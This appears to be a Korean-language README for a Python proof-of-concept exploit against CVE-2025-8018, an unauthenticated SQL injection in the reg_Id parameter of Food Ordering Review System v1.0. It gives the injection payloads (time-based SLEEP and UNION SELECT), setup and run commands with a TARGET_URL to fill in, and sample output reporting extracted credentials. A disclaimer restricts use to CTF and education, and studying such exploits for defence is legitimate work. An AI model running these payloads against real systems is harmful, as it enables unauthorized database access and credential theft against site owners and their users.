
# CVE-2025-8018용 Python PoC 익스플로잇 Food Ordering Review System v1.0의 치명적인 인증되지 않은 SQL 인젝션 취약점에 대한 Python PoC 익스플로잇입니다. 윤리적 해킹 및 CTF 훈련을 위한 시간 기반 블라인드 및 UNION 기반 데이터 추출을 지원합니다.
이 저장소는 Food Ordering Review System v1.0에서 발견된 높은 심각도의 SQL 인젝션 취약점인 CVE‑2025‑8018에 대한 Python 개념 증명(PoC) 익스플로잇을 제공합니다. 이 취약점은 reservation_page.php의 reg_Id 매개변수를 통해 트리거됩니다.
/user/reservation_page.phpreg_Idusers 테이블에서 데이터 추출을 포함한 임의의 SQL 쿼리를 실행할 수 있음SLEEP()을 사용한 시간 기반 블라인드 SQL 인젝션 확인UNION SELECT NULL,NULL,...을 사용한 컬럼 수 확인requests 라이브러리의존성 설치:
pip install requests
사용 방법 저장소 클론:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
대상 URL 업데이트:
cve-2025-8018.py를 열고 다음을 수정:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" TARGET-IP를 취약한 시스템의 실제 주소로 바꾸세요.
익스플로잇 스크립트 실행:
python3 cve-2025-8018.py
출력
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ 면책 조항 이 PoC는 CTF 챌린지, 사이버보안 교육, 또는 자신의 시스템에 대한 방어 테스트와 같은 교육 목적으로만 제공됩니다.
명시적 허가 없이 운영 중인 시스템이나 테스트 권한이 없는 시스템에는 사용하지 마십시오. 작성자 및 관련 당사자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.